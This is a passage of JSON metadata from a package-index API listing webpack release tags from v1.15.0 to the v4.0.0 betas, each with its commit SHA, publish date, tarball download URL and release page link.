//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e